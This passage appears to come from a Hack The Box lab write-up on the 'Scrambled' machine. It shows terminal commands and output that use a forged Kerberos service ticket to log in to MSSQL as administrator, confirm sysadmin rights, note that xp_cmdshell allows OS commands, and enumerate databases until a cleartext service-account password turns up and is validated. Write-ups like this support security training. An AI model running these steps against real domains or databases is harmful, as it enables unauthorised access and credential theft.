administrator Session
Using the forged TGS ticket, I can authenticate directly to the target MSSQL instance as the administrator user
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ KRB5CCNAME=administrator.ccache impacket-mssqlclient scrm.local/@dc1.scrm.local -no-pass -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] envchange(database): Old Value: master, New Value: master
[*] envchange(language): Old Value: , New Value: us_english
[*] envchange(packetsize): Old Value: 4096, New Value: 16192
[*] info(dc1): Line 1: Changed database context to 'master'.
[*] info(dc1): Line 1: Changed language setting to us_english.
[*] ack: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (SCRM\administrator dbo@master)> The execution above indicates that the forged TGS ticket was successfully authenticated and accepted by the MSSQL instance. In this context, the authentication process occurs directly with the MSSQL server, and the forged TGS ticket is presented as proof of the user’s identity. The Key Distribution Center (KDC) is not involved in this stage, as the TGS ticket was already forged and saved offline.
sysadmin
SQL (SCRM\administrator dbo@master)> SELECT is_srvrolemember('sysadmin');
-
1 As expected, the impersonated administrator user is indeed a sysadmin user within the MSSQL server
The impersonated administrator user being a sysadmin user within the target MSSQL instance grants OS command execution privileges via xp_cmdshell
While this could be leveraged to gain the initial foothold on the target system, I will further explore the MSSQL server
Databases
SQL (SCRM\administrator dbo@master)> SELECT name from master..sysdatabases;
name
----------
master
tempdb
model
msdb
ScrambleHR
There is a single none default DB; ScrambleHR
ScrambleHR DB
SQL (SCRM\administrator dbo@master)> SELECT table_name FROM ScrambleHR.information_schema.tables;
table_name
----------
Employees
UserImport
Timesheets
ScrambleHR.Employees Table
SQL (SCRM\administrator dbo@master)> SELECT * FROM ScrambleHR.dbo.Employees;
EmployeeID FirstName Surname Title Manager Role
---------- --------- ------- ----- ------- ---- The ScrambleHR.Employees table is empty
ScrambleHR.UserImport Table
SQL (SCRM\administrator dbo@master)> SELECT * FROM ScrambleHR.dbo.UserImport;
LdapUser LdapPwd LdapDomain RefreshInterval IncludeGroups
-------- ----------------- ---------- --------------- -------------
MiscSvc ScrambledEggs9900 scrm.local 90 0 The ScrambleHR.UserImport table contains a CLEARTEXT credential of the miscsvc account
Column names suggest that the account is used for LDAP services
Additionally, the miscsvc account has already been identified to be a valid user within the target domain during the BloodHound session
The credential must be validated first
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ impacket-getTGT scrm.local/miscsvc@dc1.scrm.local -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
password: ScrambledEggs9900
[*] Saving ticket in miscsvc@dc1.scrm.local.ccacheTGT generated
The credential of the miscsvc account is validated
This may be used to gain a lateral movement to the miscsvc account
ScrambleHR.Timesheets Table
SQL (SCRM\administrator dbo@master)> SELECT * FROM ScrambleHR.dbo.Timesheets;
EmployeeID TimeStart TimeEnd
---------- --------- -------
The ScrambleHR.Timesheets table is empty